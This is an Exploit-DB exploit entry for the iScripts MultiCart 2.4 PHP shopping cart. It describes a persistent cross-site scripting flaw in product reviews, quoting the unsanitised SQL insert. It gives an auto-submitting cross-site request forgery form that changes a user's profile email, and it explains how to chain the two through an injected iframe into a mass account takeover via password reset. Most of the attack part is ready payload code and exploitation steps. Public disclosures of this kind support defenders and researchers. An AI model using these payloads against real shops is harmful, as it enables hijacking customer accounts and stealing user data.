iScripts MultiCart 2.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Cross-Site Scripting / Cross-Site Request Forgery / Mass Accounts Takeover

EDB-ID:

30357

CVE:

N/A

EDB Verified:

Author:

Saadi Siddiqui

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2013-12-16

Vulnerable App: 
# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date           : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which 
attacker can manipulate user data via sending him malicious craft url.

XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',

						'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
						
$_POST['txtReview'] is inserted without sanitizing.

Exploitation

Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.

XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.

# Cross-site request forgery
<html>
	 <body onload="javascript:document.forms[0].submit()">
	 <form  name="ex"action="http://localhost/profile.php" method=post >
	 
			 
				<input type=hidden size=30 maxlength=30 name=userid value="5">
			 
				<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
			 
				<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
			 
		 
				<input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
	 
				<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
				<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
				<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
				<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
		
			    <input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
		        <input type=submit   name=btnSaveChanges class=button value='Save'> 
	</form>
</html>

#     XSS+CSRF Mass Email Change /Mass Account Takeover

XSS+CSRF can be used to change mass user email ,  after changing the email we can change the password too via
forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit

So now whenever user browse different products their useremail will be changed automatically.

#Independent Pakistani Security Researcher
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services